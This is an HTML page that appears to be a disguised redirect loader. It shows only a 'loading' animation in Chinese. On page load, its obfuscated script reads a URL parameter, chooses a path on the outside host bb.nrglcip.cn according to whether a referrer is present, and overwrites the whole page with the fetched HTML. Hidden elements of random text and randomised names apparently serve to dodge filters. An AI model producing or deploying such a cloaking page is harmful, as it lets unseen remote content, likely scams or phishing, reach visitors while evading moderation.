<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .YT81RND {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .YT81RND .NhTYxc {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .YT81RND .content {
            line-height: 50px;
            text-align: center
        }

        .YT81RND .img {
            width: 100%
        }

        .YT81RND .WmC7sUbU7 {
            text-align: center
        }

        .YT81RND .WmC7sUbU7 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .YT81RND .WmC7sUbU7 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .YT81RND .WmC7sUbU7 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .YT81RND .WmC7sUbU7 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .YT81RND .WmC7sUbU7 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .YT81RND .WmC7sUbU7 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .YT81RND .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function DNHpVRQDtL(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var aJk5J = DNHpVRQDtL('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ aJk5J +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ aJk5J +".html?a=share";
		}
		
        vdgtc9=url+"#"+new Date().getTime();
        vdgtc9 && function() {
            $.get(vdgtc9, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<h1 style='display:none' >Yd9HwMu2RAVyvoOuto16yiTHNnLMAqX</h1>
<h1 style='display:none' >Yd9HwMu2RAVyvoOuto16yiTHNnLMAqX</h1>
<p  style='display:none'>RF2mAIRs7qITVehTLR8qlrqhau0mnYyvtFHqxZni6lWAQtznyspYO0FQdo9T5wnPnxeiaLImnIAYRvKlFo69xc7wOEnIYX</p>
<span style='display:none'>MGaAOZr2g1uRrowPaANPuH1bPcRmvOqyUVJcGk6iH7L</span>
<li style='display:none' >aDB8bEkmDSM</li>
<p  style='display:none'>RF2mAIRs7qITVehTLR8qlrqhau0mnYyvtFHqxZni6lWAQtznyspYO0FQdo9T5wnPnxeiaLImnIAYRvKlFo69xc7wOEnIYX</p><div class="YT81RND">
    <div class="NhTYxc">
        <div class="WmC7sUbU7">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>OvuIW7igcIoGqBWpkwjMFr9WKPsAM</a>
<a  href='#' style='display:none'>OvuIW7igcIoGqBWpkwjMFr9WKPsAM</a>
<p  style='display:none'>zgDI5echdE9q4cTsamMX7imPfh55gGarjZXlziBWrzKlI</p></body>
</html>